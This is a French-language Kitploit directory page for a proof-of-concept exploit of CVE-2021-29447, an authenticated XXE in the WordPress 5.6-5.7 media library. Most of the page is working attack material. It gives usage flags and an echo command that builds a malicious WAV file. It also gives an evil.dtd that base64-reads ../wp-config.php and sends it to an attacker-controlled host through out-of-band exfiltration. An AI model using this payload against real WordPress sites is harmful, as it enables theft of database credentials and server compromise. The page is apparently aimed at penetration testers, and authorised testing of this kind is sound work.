Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-29447 — Exploit de preuve de concept pour CVE-2021-29447 : XXE authentifié dans la bibliothèque multimédia de WordPress 5.6-5.7. Génère un fichier WAV malveillant et un DTD pour lire des fichiers arbitraires du serveur via une exfiltration de données hors bande. | Kitploit
Outils/GitHubGitHub/g01d3nw01f/cve-2021-29447
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubg01d3nw01f/cve-2021-29447

CVE-2021-29447

Exploit de preuve de concept pour CVE-2021-29447 : XXE authentifié dans la bibliothèque multimédia de WordPress 5.6-5.7. Génère un fichier WAV malveillant et un DTD pour lire des fichiers arbitraires du serveur via une exfiltration de données hors bande.

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-29447 WordPress 5.6-5.7 - Authentifié (Auteur+) XXE

https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

utilisation :

-l LHOST exemple : 127.0.0.1 -n NAME exemple : payload.wav -dn DTD_NAME exemple : evil.dtd -r READ exemple : ../wp-config.php

evil-wav-dtd-xxe.py: erreur : les arguments suivants sont requis : -l/--lhost, -n/--name, -dn/--dtd, -r/--read

exemple d'exécution du script :

./evil-wav-dtd-xxe.py -l 127.0.0.1 -n payload.wav -dn evil.dtd -r "../wp-config.php"

root@kitploit:~
[*]Created: evil.dtd
-------------------------------------------------------------------------
-- below commands run in terminal directory: generate the .wav file   --
-------------------------------------------------------------------------
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://127.0.0.1/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

evil.dtd (génération automatique)

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://127.0.0.1/?p=%file;'>" >
Télécharger l’outil